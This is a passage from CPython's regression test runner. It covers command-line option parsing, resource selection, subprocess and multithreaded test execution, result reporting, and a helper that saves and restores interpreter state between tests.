gui - Run tests that require a running GUI.
To enable all resources except one, use '-uall,-<resource>'. For
example, to run all the tests except for the gui tests, give the
option '-uall,-gui'.
"""
# We import importlib *ASAP* in order to test #15386
import importlib
import argparse
import builtins
import faulthandler
import io
import json
import locale
import logging
import os
import platform
import random
import re
import shutil
import signal
import sys
import sysconfig
import tempfile
import time
import traceback
import unittest
import warnings
from inspect import isabstract
try:
import threading
except ImportError:
threading = None
try:
import _multiprocessing, multiprocessing.process
except ImportError:
multiprocessing = None
# Some times __path__ and __file__ are not absolute (e.g. while running from
# Lib/) and, if we change the CWD to run the tests in a temporary dir, some
# imports might fail. This affects only the modules imported before os.chdir().
# These modules are searched first in sys.path[0] (so '' -- the CWD) and if
# they are found in the CWD their __file__ and __path__ will be relative (this
# happens before the chdir). All the modules imported after the chdir, are
# not found in the CWD, and since the other paths in sys.path[1:] are absolute
# (site.py absolutize them), the __file__ and __path__ will be absolute too.
# Therefore it is necessary to absolutize manually the __file__ and __path__ of
# the packages to prevent later imports to fail when the CWD is different.
for module in sys.modules.values():
if hasattr(module, '__path__'):
module.__path__ = [os.path.abspath(path) for path in module.__path__]
if hasattr(module, '__file__'):
module.__file__ = os.path.abspath(module.__file__)
# MacOSX (a.k.a. Darwin) has a default stack size that is too small
# for deeply recursive regular expressions. We see this as crashes in
# the Python test suite when running test_re.py and test_sre.py. The
# fix is to set the stack limit to 2048.
# This approach may also be useful for other Unixy platforms that
# suffer from small default stack limits.
if sys.platform == 'darwin':
try:
import resource
except ImportError:
pass
else:
soft, hard = resource.getrlimit(resource.RLIMIT_STACK)
newsoft = min(hard, max(soft, 1024*2048))
resource.setrlimit(resource.RLIMIT_STACK, (newsoft, hard))
# Test result constants.
PASSED = 1
FAILED = 0
ENV_CHANGED = -1
SKIPPED = -2
RESOURCE_DENIED = -3
INTERRUPTED = -4
CHILD_ERROR = -5 # error in a child process
from test import support
RESOURCE_NAMES = ('audio', 'curses', 'largefile', 'network',
'decimal', 'cpu', 'subprocess', 'urlfetch', 'gui')
# When tests are run from the Python build directory, it is best practice
# to keep the test files in a subfolder. This eases the cleanup of leftover
# files using the "make distclean" command.
if sysconfig.is_python_build():
TEMPDIR = os.path.join(sysconfig.get_config_var('srcdir'), 'build')
else:
TEMPDIR = tempfile.gettempdir()
TEMPDIR = os.path.abspath(TEMPDIR)
class _ArgParser(argparse.ArgumentParser):
def error(self, message):
super().error(message + "\nPass -h or --help for complete help.")
def _create_parser():
# Set prog to prevent the uninformative "__main__.py" from displaying in
# error messages when using "python -m test ...".
parser = _ArgParser(prog='regrtest.py',
usage=USAGE,
description=DESCRIPTION,
epilog=EPILOG,
add_help=False,
formatter_class=argparse.RawDescriptionHelpFormatter)
# Arguments with this clause added to its help are described further in
# the epilog's "Additional option details" section.
more_details = ' See the section at bottom for more details.'
group = parser.add_argument_group('General options')
# We add help explicitly to control what argument group it renders under.
group.add_argument('-h', '--help', action='help',
help='show this help message and exit')
group.add_argument('--timeout', metavar='TIMEOUT', type=float,
help='dump the traceback and exit if a test takes '
'more than TIMEOUT seconds; disabled if TIMEOUT '
'is negative or equal to zero')
group.add_argument('--wait', action='store_true',
help='wait for user input, e.g., allow a debugger '
'to be attached')
group.add_argument('--slaveargs', metavar='ARGS')
group.add_argument('-S', '--start', metavar='START',
help='the name of the test at which to start.' +
more_details)
group = parser.add_argument_group('Verbosity')
group.add_argument('-v', '--verbose', action='count',
help='run tests in verbose mode with output to stdout')
group.add_argument('-w', '--verbose2', action='store_true',
help='re-run failed tests in verbose mode')
group.add_argument('-W', '--verbose3', action='store_true',
help='display test output on failure')
group.add_argument('-q', '--quiet', action='store_true',
help='no output unless one or more tests fail')
group.add_argument('-o', '--slow', action='store_true', dest='print_slow',
help='print the slowest 10 tests')
group.add_argument('--header', action='store_true',
help='print header with interpreter info')
group = parser.add_argument_group('Selecting tests')
group.add_argument('-r', '--randomize', action='store_true',
help='randomize test execution order.' + more_details)
group.add_argument('--randseed', metavar='SEED',
dest='random_seed', type=int,
help='pass a random seed to reproduce a previous '
'random run')
group.add_argument('-f', '--fromfile', metavar='FILE',
help='read names of tests to run from a file.' +
more_details)
group.add_argument('-x', '--exclude', action='store_true',
help='arguments are tests to *exclude*')
group.add_argument('-s', '--single', action='store_true',
help='single step through a set of tests.' +
more_details)
group.add_argument('-m', '--match', metavar='PAT',
dest='match_tests',
help='match test cases and methods with glob pattern PAT')
group.add_argument('-G', '--failfast', action='store_true',
help='fail as soon as a test fails (only with -v or -W)')
group.add_argument('-u', '--use', metavar='RES1,RES2,...',
action='append', type=resources_list,
help='specify which special resource intensive tests '
'to run.' + more_details)
group.add_argument('-M', '--memlimit', metavar='LIMIT',
help='run very large memory-consuming tests.' +
more_details)
group.add_argument('--testdir', metavar='DIR',
type=relative_filename,
help='execute test files in the specified directory '
'(instead of the Python stdlib test suite)')
group = parser.add_argument_group('Special runs')
group.add_argument('-l', '--findleaks', action='store_true',
help='if GC is available detect tests that leak memory')
group.add_argument('-L', '--runleaks', action='store_true',
help='run the leaks(1) command just before exit.' +
more_details)
group.add_argument('-R', '--huntrleaks', metavar='RUNCOUNTS',
type=huntrleaks,
help='search for reference leaks (needs debug build, '
'very slow).' + more_details)
group.add_argument('-j', '--multiprocess', metavar='PROCESSES',
dest='use_mp', type=int,
help='run PROCESSES processes at once')
group.add_argument('-T', '--coverage', action='store_true',
dest='trace',
help='turn on code coverage tracing using the trace '
'module')
group.add_argument('-D', '--coverdir', metavar='DIR',
type=relative_filename,
help='directory where coverage files are put')
group.add_argument('-N', '--nocoverdir',
action='store_const', const=None, dest='coverdir',
help='put coverage files alongside modules')
group.add_argument('-t', '--threshold', metavar='THRESHOLD',
type=int,
help='call gc.set_threshold(THRESHOLD)')
group.add_argument('-n', '--nowindows', action='store_true',
help='suppress error message boxes on Windows')
group.add_argument('-F', '--forever', action='store_true',
help='run the specified tests in a loop, until an '
'error happens')
parser.add_argument('args', nargs=argparse.REMAINDER,
help=argparse.SUPPRESS)
return parser
def relative_filename(string):
# CWD is replaced with a temporary dir before calling main(), so we
# join it with the saved CWD so it ends up where the user expects.
return os.path.join(support.SAVEDCWD, string)
def huntrleaks(string):
args = string.split(':')
if len(args) not in (2, 3):
raise argparse.ArgumentTypeError(
'needs 2 or 3 colon-separated arguments')
nwarmup = int(args[0]) if args[0] else 5
ntracked = int(args[1]) if args[1] else 4
fname = args[2] if len(args) > 2 and args[2] else 'reflog.txt'
return nwarmup, ntracked, fname
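# Editor's illustration of the parsing above (matching the -R defaults in the
# epilog):
#   huntrleaks(':')              -> (5, 4, 'reflog.txt')
#   huntrleaks('6:3:leaks.log')  -> (6, 3, 'leaks.log')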
def resources_list(string):
u = [x.lower() for x in string.split(',')]
for r in u:
if r == 'all' or r == 'none':
continue
if r[0] == '-':
r = r[1:]
if r not in RESOURCE_NAMES:
raise argparse.ArgumentTypeError('invalid resource: ' + r)
return u
def _parse_args(args, **kwargs):
# Defaults
ns = argparse.Namespace(testdir=None, verbose=0, quiet=False,
exclude=False, single=False, randomize=False, fromfile=None,
findleaks=False, use_resources=None, trace=False, coverdir='coverage',
runleaks=False, huntrleaks=False, verbose2=False, print_slow=False,
random_seed=None, use_mp=None, verbose3=False, forever=False,
header=False, failfast=False, match_tests=None)
for k, v in kwargs.items():
if not hasattr(ns, k):
raise TypeError('%r is an invalid keyword argument '
'for this function' % k)
setattr(ns, k, v)
if ns.use_resources is None:
ns.use_resources = []
parser = _create_parser()
parser.parse_args(args=args, namespace=ns)
if ns.single and ns.fromfile:
parser.error("-s and -f don't go together!")
if ns.use_mp and ns.trace:
parser.error("-T and -j don't go together!")
if ns.use_mp and ns.findleaks:
parser.error("-l and -j don't go together!")
if ns.use_mp and ns.memlimit:
parser.error("-M and -j don't go together!")
if ns.failfast and not (ns.verbose or ns.verbose3):
parser.error("-G/--failfast needs either -v or -W")
if ns.quiet:
ns.verbose = 0
if ns.timeout is not None:
if hasattr(faulthandler, 'dump_traceback_later'):
if ns.timeout <= 0:
ns.timeout = None
else:
print("Warning: The timeout option requires "
"faulthandler.dump_traceback_later")
ns.timeout = None
if ns.use_mp is not None:
if ns.use_mp <= 0:
# Use all cores + extras for tests that like to sleep
ns.use_mp = 2 + (os.cpu_count() or 1)
if ns.use_mp == 1:
ns.use_mp = None
if ns.use:
for a in ns.use:
for r in a:
if r == 'all':
ns.use_resources[:] = RESOURCE_NAMES
continue
if r == 'none':
del ns.use_resources[:]
continue
remove = False
if r[0] == '-':
remove = True
r = r[1:]
if remove:
if r in ns.use_resources:
ns.use_resources.remove(r)
elif r not in ns.use_resources:
ns.use_resources.append(r)
if ns.random_seed is not None:
ns.randomize = True
return ns
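# Editor's illustration (hypothetical invocation): the resource handling above
# expands the "-uall,-<resource>" form described in the epilog, e.g.
#   ns = _parse_args(['-uall,-gui'])
# leaves ns.use_resources equal to every name in RESOURCE_NAMES except 'gui'.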
def run_test_in_subprocess(testname, ns):
"""Run the given test in a subprocess with --slaveargs.
ns is the option Namespace parsed from command-line arguments. regrtest
is invoked in a subprocess with the --slaveargs argument; when the
subprocess exits, its return code, stdout and stderr are returned as a
3-tuple.
"""
from subprocess import Popen, PIPE
base_cmd = ([sys.executable] + support.args_from_interpreter_flags() +
['-X', 'faulthandler', '-m', 'test.regrtest'])
slaveargs = (
(testname, ns.verbose, ns.quiet),
dict(huntrleaks=ns.huntrleaks,
use_resources=ns.use_resources,
output_on_failure=ns.verbose3,
timeout=ns.timeout, failfast=ns.failfast,
match_tests=ns.match_tests))
# Running the child from the same working directory as regrtest's original
# invocation ensures that TEMPDIR for the child is the same when
# sysconfig.is_python_build() is true. See issue 15300.
popen = Popen(base_cmd + ['--slaveargs', json.dumps(slaveargs)],
stdout=PIPE, stderr=PIPE,
universal_newlines=True,
close_fds=(os.name != 'nt'),
cwd=support.SAVEDCWD)
stdout, stderr = popen.communicate()
retcode = popen.wait()
return retcode, stdout, stderr
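# Editor's note: roughly, for a test named 'test_os' the child is invoked as
#   python -X faulthandler -m test.regrtest --slaveargs '[["test_os", 0, false], {...}]'
# (plus any inherited interpreter flags), and the last line of its stdout is a
# JSON-encoded [result_code, test_time] pair that the -j worker threads parse back.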
def main(tests=None, **kwargs):
"""Execute a test suite.
This also parses command-line options and modifies its behavior
accordingly.
tests -- a list of strings containing test names (optional)
testdir -- the directory in which to look for tests (optional)
Users other than the Python test suite will certainly want to
specify testdir; if it's omitted, the directory containing the
Python test suite is searched for.
If the tests argument is omitted, the tests listed on the
command-line will be used. If that's empty, too, then all *.py
files beginning with test_ will be used.
The other default arguments (verbose, quiet, exclude,
single, randomize, findleaks, use_resources, trace, coverdir,
print_slow, and random_seed) allow programmers calling main()
directly to set the values that would normally be set by flags
on the command line.
"""
# Display the Python traceback on fatal errors (e.g. segfault)
faulthandler.enable(all_threads=True)
# Display the Python traceback on SIGALRM or SIGUSR1 signal
signals = []
if hasattr(signal, 'SIGALRM'):
signals.append(signal.SIGALRM)
if hasattr(signal, 'SIGUSR1'):
signals.append(signal.SIGUSR1)
for signum in signals:
faulthandler.register(signum, chain=True)
replace_stdout()
support.record_original_stdout(sys.stdout)
ns = _parse_args(sys.argv[1:], **kwargs)
if ns.huntrleaks:
# Avoid false positives due to various caches
# filling slowly with random data:
warm_caches()
if ns.memlimit is not None:
support.set_memlimit(ns.memlimit)
if ns.threshold is not None:
import gc
gc.set_threshold(ns.threshold)
if ns.nowindows:
import msvcrt
msvcrt.SetErrorMode(msvcrt.SEM_FAILCRITICALERRORS|
msvcrt.SEM_NOALIGNMENTFAULTEXCEPT|
msvcrt.SEM_NOGPFAULTERRORBOX|
msvcrt.SEM_NOOPENFILEERRORBOX)
try:
msvcrt.CrtSetReportMode
except AttributeError:
# release build
pass
else:
for m in [msvcrt.CRT_WARN, msvcrt.CRT_ERROR, msvcrt.CRT_ASSERT]:
msvcrt.CrtSetReportMode(m, msvcrt.CRTDBG_MODE_FILE)
msvcrt.CrtSetReportFile(m, msvcrt.CRTDBG_FILE_STDERR)
if ns.wait:
input("Press any key to continue...")
if ns.slaveargs is not None:
args, kwargs = json.loads(ns.slaveargs)
if kwargs.get('huntrleaks'):
unittest.BaseTestSuite._cleanup = False
try:
result = runtest(*args, **kwargs)
except KeyboardInterrupt:
result = INTERRUPTED, ''
except BaseException as e:
traceback.print_exc()
result = CHILD_ERROR, str(e)
sys.stdout.flush()
print() # Force a newline (just in case)
print(json.dumps(result))
sys.exit(0)
good = []
bad = []
skipped = []
resource_denieds = []
environment_changed = []
interrupted = False
if ns.findleaks:
try:
import gc
except ImportError:
print('No GC available, disabling findleaks.')
ns.findleaks = False
else:
# Uncomment the line below to report garbage that is not
# freeable by reference counting alone. By default only
# garbage that is not collectable by the GC is reported.
#gc.set_debug(gc.DEBUG_SAVEALL)
found_garbage = []
if ns.huntrleaks:
unittest.BaseTestSuite._cleanup = False
if ns.single:
filename = os.path.join(TEMPDIR, 'pynexttest')
try:
with open(filename, 'r') as fp:
next_test = fp.read().strip()
tests = [next_test]
except OSError:
pass
if ns.fromfile:
tests = []
with open(os.path.join(support.SAVEDCWD, ns.fromfile)) as fp:
count_pat = re.compile(r'\[\s*\d+/\s*\d+\]')
for line in fp:
line = count_pat.sub('', line)
guts = line.split() # assuming no test has whitespace in its name
if guts and not guts[0].startswith('#'):
tests.extend(guts)
# Strip .py extensions.
removepy(ns.args)
removepy(tests)
stdtests = STDTESTS[:]
nottests = NOTTESTS.copy()
if ns.exclude:
for arg in ns.args:
if arg in stdtests:
stdtests.remove(arg)
nottests.add(arg)
ns.args = []
# For a partial run, we do not need to clutter the output.
if ns.verbose or ns.header or not (ns.quiet or ns.single or tests or ns.args):
# Print basic platform information
print("==", platform.python_implementation(), *sys.version.split())
#print("== ", platform.platform(aliased=True),
# "%s-endian" % sys.byteorder)
print("== ", "hash algorithm:", sys.hash_info.algorithm,
"64bit" if sys.maxsize > 2**32 else "32bit")
print("== ", os.getcwd())
print("Testing with flags:", sys.flags)
# if testdir is set, then we are not running the python tests suite, so
# don't add default tests to be executed or skipped (pass empty values)
if ns.testdir:
alltests = findtests(ns.testdir, list(), set())
else:
alltests = findtests(ns.testdir, stdtests, nottests)
selected = tests or ns.args or alltests
if ns.single:
selected = selected[:1]
try:
next_single_test = alltests[alltests.index(selected[0])+1]
except IndexError:
next_single_test = None
# Remove all the selected tests that precede start if it's set.
if ns.start:
try:
del selected[:selected.index(ns.start)]
except ValueError:
print("Couldn't find starting test (%s), using all tests" % ns.start)
if ns.randomize:
if ns.random_seed is None:
ns.random_seed = random.randrange(10000000)
random.seed(ns.random_seed)
print("Using random seed", ns.random_seed)
random.shuffle(selected)
if ns.trace:
import trace, tempfile
tracer = trace.Trace(ignoredirs=[sys.base_prefix, sys.base_exec_prefix,
tempfile.gettempdir()],
trace=False, count=True)
test_times = []
support.verbose = ns.verbose # Tell tests to be moderately quiet
support.use_resources = ns.use_resources
save_modules = sys.modules.keys()
def accumulate_result(test, result):
ok, test_time = result
test_times.append((test_time, test))
if ok == PASSED:
good.append(test)
elif ok == FAILED:
bad.append(test)
elif ok == ENV_CHANGED:
environment_changed.append(test)
elif ok == SKIPPED:
skipped.append(test)
elif ok == RESOURCE_DENIED:
skipped.append(test)
resource_denieds.append(test)
if ns.forever:
def test_forever(tests=list(selected)):
while True:
for test in tests:
yield test
if bad:
return
tests = test_forever()
test_count = ''
test_count_width = 3
else:
tests = iter(selected)
test_count = '/{}'.format(len(selected))
test_count_width = len(test_count) - 1
if ns.use_mp:
try:
from threading import Thread
except ImportError:
print("Multiprocess option requires thread support")
sys.exit(2)
from queue import Queue
debug_output_pat = re.compile(r"\[\d+ refs, \d+ blocks\]$")
output = Queue()
pending = MultiprocessTests(tests)
def work():
# A worker thread.
try:
while True:
try:
test = next(pending)
except StopIteration:
output.put((None, None, None, None))
return
retcode, stdout, stderr = run_test_in_subprocess(test, ns)
# Strip last refcount output line if it exists, since it
# comes from the shutdown of the interpreter in the subcommand.
stderr = debug_output_pat.sub("", stderr)
stdout, _, result = stdout.strip().rpartition("\n")
if retcode != 0:
result = (CHILD_ERROR, "Exit code %s" % retcode)
output.put((test, stdout.rstrip(), stderr.rstrip(), result))
return
if not result:
output.put((None, None, None, None))
return
result = json.loads(result)
output.put((test, stdout.rstrip(), stderr.rstrip(), result))
except BaseException:
output.put((None, None, None, None))
raise
workers = [Thread(target=work) for i in range(ns.use_mp)]
for worker in workers:
worker.start()
finished = 0
test_index = 1
try:
while finished < ns.use_mp:
test, stdout, stderr, result = output.get()
if test is None:
finished += 1
continue
accumulate_result(test, result)
if not ns.quiet:
fmt = "[{1:{0}}{2}/{3}] {4}" if bad else "[{1:{0}}{2}] {4}"
print(fmt.format(
test_count_width, test_index, test_count,
len(bad), test))
if stdout:
print(stdout)
if stderr:
print(stderr, file=sys.stderr)
sys.stdout.flush()
sys.stderr.flush()
if result[0] == INTERRUPTED:
raise KeyboardInterrupt
if result[0] == CHILD_ERROR:
raise Exception("Child error on {}: {}".format(test, result[1]))
test_index += 1
except KeyboardInterrupt:
interrupted = True
pending.interrupted = True
for worker in workers:
worker.join()
else:
for test_index, test in enumerate(tests, 1):
if not ns.quiet:
fmt = "[{1:{0}}{2}/{3}] {4}" if bad else "[{1:{0}}{2}] {4}"
print(fmt.format(
test_count_width, test_index, test_count, len(bad), test))
sys.stdout.flush()
if ns.trace:
# If we're tracing code coverage, then we don't exit with status
# based on a false return value from main.
tracer.runctx('runtest(test, ns.verbose, ns.quiet, timeout=ns.timeout)',
globals=globals(), locals=vars())
else:
try:
result = runtest(test, ns.verbose, ns.quiet,
ns.huntrleaks,
output_on_failure=ns.verbose3,
timeout=ns.timeout, failfast=ns.failfast,
match_tests=ns.match_tests)
accumulate_result(test, result)
except KeyboardInterrupt:
interrupted = True
break
if ns.findleaks:
gc.collect()
if gc.garbage:
print("Warning: test created", len(gc.garbage), end=' ')
print("uncollectable object(s).")
# move the uncollectable objects somewhere so we don't see
# them again
found_garbage.extend(gc.garbage)
del gc.garbage[:]
# Unload the newly imported modules (best effort finalization)
for module in sys.modules.keys():
if module not in save_modules and module.startswith("test."):
support.unload(module)
if interrupted:
# print a newline after ^C
print()
print("Test suite interrupted by signal SIGINT.")
omitted = set(selected) - set(good) - set(bad) - set(skipped)
print(count(len(omitted), "test"), "omitted:")
printlist(omitted)
if good and not ns.quiet:
if not bad and not skipped and not interrupted and len(good) > 1:
print("All", end=' ')
print(count(len(good), "test"), "OK.")
if ns.print_slow:
test_times.sort(reverse=True)
print("10 slowest tests:")
for time, test in test_times[:10]:
print("%s: %.1fs" % (test, time))
if bad:
bad = sorted(set(bad) - set(environment_changed))
if bad:
print(count(len(bad), "test"), "failed:")
printlist(bad)
if environment_changed:
print("{} altered the execution environment:".format(
count(len(environment_changed), "test")))
printlist(environment_changed)
if skipped and not ns.quiet:
print(count(len(skipped), "test"), "skipped:")
printlist(skipped)
if ns.verbose2 and bad:
print("Re-running failed tests in verbose mode")
for test in bad:
print("Re-running test %r in verbose mode" % test)
sys.stdout.flush()
try:
ns.verbose = True
ok = runtest(test, True, ns.quiet, ns.huntrleaks,
timeout=ns.timeout)
except KeyboardInterrupt:
# print a newline separate from the ^C
print()
break
if ns.single:
if next_single_test:
with open(filename, 'w') as fp:
fp.write(next_single_test + '\n')
else:
os.unlink(filename)
if ns.trace:
r = tracer.results()
r.write_results(show_missing=True, summary=True, coverdir=ns.coverdir)
if ns.runleaks:
os.system("leaks %d" % os.getpid())
sys.exit(len(bad) > 0 or interrupted)
# small set of tests to determine if we have a basically functioning interpreter
# (i.e. if any of these fail, then anything else is likely to follow)
STDTESTS = [
'test_grammar',
'test_opcodes',
'test_dict',
'test_builtin',
'test_exceptions',
'test_types',
'test_unittest',
'test_doctest',
'test_doctest2',
'test_support'
]
# set of tests that we don't want to be executed when using regrtest
NOTTESTS = set()
def findtests(testdir=None, stdtests=STDTESTS, nottests=NOTTESTS):
"""Return a list of all applicable test modules."""
testdir = findtestdir(testdir)
names = os.listdir(testdir)
tests = []
others = set(stdtests) | nottests
for name in names:
mod, ext = os.path.splitext(name)
if mod[:5] == "test_" and ext in (".py", "") and mod not in others:
tests.append(mod)
return stdtests + sorted(tests)
# We do not use a generator so multiple threads can call next().
class MultiprocessTests(object):
"""A thread-safe iterator over tests for multiprocess mode."""
def __init__(self, tests):
self.interrupted = False
self.lock = threading.Lock()
self.tests = tests
def __iter__(self):
return self
def __next__(self):
with self.lock:
if self.interrupted:
raise StopIteration('tests interrupted')
return next(self.tests)
def replace_stdout():
"""Set stdout encoder error handler to backslashreplace (as stderr error
handler) to avoid UnicodeEncodeError when printing a traceback"""
import atexit
stdout = sys.stdout
sys.stdout = open(stdout.fileno(), 'w',
encoding=stdout.encoding,
errors="backslashreplace",
closefd=False,
newline='\n')
def restore_stdout():
sys.stdout.close()
sys.stdout = stdout
atexit.register(restore_stdout)
if sys.platform == "uwp":
""" For UWP, do not replace the stdout as there isn't a stdout """
def replace_stdout():
pass
def runtest(test, verbose, quiet,
huntrleaks=False, use_resources=None,
output_on_failure=False, failfast=False, match_tests=None,
timeout=None):
"""Run a single test.
test -- the name of the test
verbose -- if true, print more messages
quiet -- if true, don't print 'skipped' messages (probably redundant)
huntrleaks -- run multiple times to test for leaks; requires a debug
build; a triple corresponding to -R's three arguments
use_resources -- list of extra resources to use
output_on_failure -- if true, display test output on failure
timeout -- dump the traceback and exit if a test takes more than
timeout seconds
failfast, match_tests -- See regrtest command-line flags for these.
Returns the tuple result, test_time, where result is one of the constants:
INTERRUPTED KeyboardInterrupt when run under -j
RESOURCE_DENIED test skipped because resource denied
SKIPPED test skipped for some other reason
ENV_CHANGED test failed because it changed the execution environment
FAILED test failed
PASSED test passed
"""
if use_resources is not None:
support.use_resources = use_resources
use_timeout = (timeout is not None)
if use_timeout:
faulthandler.dump_traceback_later(timeout, exit=True)
try:
support.match_tests = match_tests
if failfast:
support.failfast = True
if output_on_failure:
support.verbose = True
# Reuse the same instance to all calls to runtest(). Some
# tests keep a reference to sys.stdout or sys.stderr
# (eg. test_argparse).
if runtest.stringio is None:
stream = io.StringIO()
runtest.stringio = stream
else:
stream = runtest.stringio
stream.seek(0)
stream.truncate()
orig_stdout = sys.stdout
orig_stderr = sys.stderr
try:
sys.stdout = stream
sys.stderr = stream
result = runtest_inner(test, verbose, quiet, huntrleaks,
display_failure=False)
if result[0] == FAILED:
output = stream.getvalue()
orig_stderr.write(output)
orig_stderr.flush()
finally:
sys.stdout = orig_stdout
sys.stderr = orig_stderr
else:
support.verbose = verbose # Tell tests to be moderately quiet
result = runtest_inner(test, verbose, quiet, huntrleaks,
display_failure=not verbose)
return result
finally:
if use_timeout:
faulthandler.cancel_dump_traceback_later()
cleanup_test_droppings(test, verbose)
runtest.stringio = None
# Unit tests are supposed to leave the execution environment unchanged
# once they complete. But sometimes tests have bugs, especially when
# tests fail, and the changes to environment go on to mess up other
# tests. This can cause issues with buildbot stability, since tests
# are run in random order and so problems may appear to come and go.
# There are a few things we can save and restore to mitigate this, and
# the following context manager handles this task.
class saved_test_environment:
"""Save bits of the test environment and restore them at block exit.
with saved_test_environment(testname, verbose, quiet):
#stuff
Unless quiet is True, a warning is printed to stderr if any of
the saved items was changed by the test. The attribute 'changed'
is initially False, but is set to True if a change is detected.
If verbose is more than 1, the before and after state of changed
items is also printed.
"""
changed = False
def __init__(self, testname, verbose=0, quiet=False):
self.testname = testname
self.verbose = verbose
self.quiet = quiet
# To add things to save and restore, add a name XXX to the resources list
# and add corresponding get_XXX/restore_XXX functions. get_XXX should
# return the value to be saved and compared against a second call to the
# get function when test execution completes. restore_XXX should accept
# the saved value and restore the resource using it. It will be called if
# and only if a change in the value is detected.
#
# Note: XXX will have any '.' replaced with '_' characters when determining
# the corresponding method names.
resources = ('sys.argv', 'cwd', 'sys.stdin', 'sys.stdout', 'sys.stderr',
'os.environ', 'sys.path', 'sys.path_hooks', '__import__',
'warnings.filters', 'asyncore.socket_map',
'logging._handlers', 'logging._handlerList', 'sys.gettrace',
'sys.warnoptions',
# multiprocessing.process._cleanup() may release ref
# to a thread, so check processes first.
'multiprocessing.process._dangling', 'threading._dangling',
'sysconfig._CONFIG_VARS', 'sysconfig._INSTALL_SCHEMES',
'files', 'locale', 'warnings.showwarning',
)
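    # Added commentary (not part of the original list above): to track an extra
    # piece of state, add its name to 'resources' and define a matching
    # get_/restore_ pair.  A hypothetical sketch for sys.dont_write_bytecode:
    #
    #     def get_sys_dont_write_bytecode(self):
    #         return sys.dont_write_bytecode
    #     def restore_sys_dont_write_bytecode(self, saved):
    #         sys.dont_write_bytecode = saved
    #
    # The getter's value is compared against a second call made after the test
    # finishes, and the restorer runs only if a change was detected.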
def get_sys_argv(self):
return id(sys.argv), sys.argv, sys.argv[:]
def restore_sys_argv(self, saved_argv):
sys.argv = saved_argv[1]
sys.argv[:] = saved_argv[2]
def get_cwd(self):
return os.getcwd()
def restore_cwd(self, saved_cwd):
os.chdir(saved_cwd)
def get_sys_stdout(self):
return sys.stdout
def restore_sys_stdout(self, saved_stdout):
sys.stdout = saved_stdout
def get_sys_stderr(self):
return sys.stderr
def restore_sys_stderr(self, saved_stderr):
sys.stderr = saved_stderr
def get_sys_stdin(self):
return sys.stdin
def restore_sys_stdin(self, saved_stdin):
sys.stdin = saved_stdin
def get_os_environ(self):
return id(os.environ), os.environ, dict(os.environ)
def restore_os_environ(self, saved_environ):
os.environ = saved_environ[1]
os.environ.clear()
os.environ.update(saved_environ[2])
def get_sys_path(self):
return id(sys.path), sys.path, sys.path[:]
def restore_sys_path(self, saved_path):
sys.path = saved_path[1]
sys.path[:] = saved_path[2]
def get_sys_path_hooks(self):
return id(sys.path_hooks), sys.path_hooks, sys.path_hooks[:]
def restore_sys_path_hooks(self, saved_hooks):
sys.path_hooks = saved_hooks[1]
sys.path_hooks[:] = saved_hooks[2]
def get_sys_gettrace(self):
return sys.gettrace()
def restore_sys_gettrace(self, trace_fxn):
sys.settrace(trace_fxn)
def get___import__(self):
return builtins.__import__
def restore___import__(self, import_):
builtins.__import__ = import_
def get_warnings_filters(self):
return id(warnings.filters), warnings.filters, warnings.filters[:]
def restore_warnings_filters(self, saved_filters):
warnings.filters = saved_filters[1]
warnings.filters[:] = saved_filters[2]
def get_asyncore_socket_map(self):
asyncore = sys.modules.get('asyncore')
# XXX Making a copy keeps objects alive until __exit__ gets called.
return asyncore and asyncore.socket_map.copy() or {}
def restore_asyncore_socket_map(self, saved_map):
asyncore = sys.modules.get('asyncore')
if asyncore is not None:
asyncore.close_all(ignore_all=True)
asyncore.socket_map.update(saved_map)
def get_shutil_archive_formats(self):
# we could call get_archives_formats() but that only returns the
# registry keys; we want to check the values too (the functions that
# are registered)
return shutil._ARCHIVE_FORMATS, shutil._ARCHIVE_FORMATS.copy()
def restore_shutil_archive_formats(self, saved):
shutil._ARCHIVE_FORMATS = saved[0]
shutil._ARCHIVE_FORMATS.clear()
shutil._ARCHIVE_FORMATS.update(saved[1])
def get_shutil_unpack_formats(self):
return shutil._UNPACK_FORMATS, shutil._UNPACK_FORMATS.copy()
def restore_shutil_unpack_formats(self, saved):
shutil._UNPACK_FORMATS = saved[0]
shutil._UNPACK_FORMATS.clear()
shutil._UNPACK_FORMATS.update(saved[1])
def get_logging__handlers(self):
# _handlers is a WeakValueDictionary
return id(logging._handlers), logging._handlers, logging._handlers.copy()
def restore_logging__handlers(self, saved_handlers):
# Can't easily revert the logging state
pass
def get_logging__handlerList(self):
# _handlerList is a list of weakrefs to handlers
return id(logging._handlerList), logging._handlerList, logging._handlerList[:]
def restore_logging__handlerList(self, saved_handlerList):
# Can't easily revert the logging state
pass
def get_sys_warnoptions(self):
return id(sys.warnoptions), sys.warnoptions, sys.warnoptions[:]
def restore_sys_warnoptions(self, saved_options):
sys.warnoptions = saved_options[1]
sys.warnoptions[:] = saved_options[2]
# Controlling dangling references to Thread objects can make it easier
# to track reference leaks.
def get_threading__dangling(self):
if not threading:
return None
# This copies the weakrefs without making any strong reference
return threading._dangling.copy()
def restore_threading__dangling(self, saved):
if not threading:
return
threading._dangling.clear()
threading._dangling.update(saved)
# Same for Process objects
def get_multiprocessing_process__dangling(self):
if not multiprocessing:
return None
# Unjoined process objects can survive after process exits
multiprocessing.process._cleanup()
# This copies the weakrefs without making any strong reference
return multiprocessing.process._dangling.copy()
def restore_multiprocessing_process__dangling(self, saved):
if not multiprocessing:
return
multiprocessing.process._dangling.clear()
multiprocessing.process._dangling.update(saved)
def get_sysconfig__CONFIG_VARS(self):
# make sure the dict is initialized
sysconfig.get_config_var('prefix')
return (id(sysconfig._CONFIG_VARS), sysconfig._CONFIG_VARS,
dict(sysconfig._CONFIG_VARS))
def restore_sysconfig__CONFIG_VARS(self, saved):
sysconfig._CONFIG_VARS = saved[1]
sysconfig._CONFIG_VARS.clear()
sysconfig._CONFIG_VARS.update(saved[2])
def get_sysconfig__INSTALL_SCHEMES(self):
return (id(sysconfig._INSTALL_SCHEMES), sysconfig._INSTALL_SCHEMES,
sysconfig._INSTALL_SCHEMES.copy())
def restore_sysconfig__INSTALL_SCHEMES(self, saved):
sysconfig._INSTALL_SCHEMES = saved[1]
sysconfig._INSTALL_SCHEMES.clear()
sysconfig._INSTALL_SCHEMES.update(saved[2])
def get_files(self):
return sorted(fn + ('/' if os.path.isdir(fn) else '')
for fn in os.listdir())
def restore_files(self, saved_value):
fn = support.TESTFN
if fn not in saved_value and (fn + '/') not in saved_value:
if os.path.isfile(fn):
support.unlink(fn)
elif os.path.isdir(fn):
support.rmtree(fn)
_lc = [getattr(locale, lc) for lc in dir(locale)
if lc.startswith('LC_')]
def get_locale(self):
pairings = []
for lc in self._lc:
try:
pairings.append((lc, locale.setlocale(lc, None)))
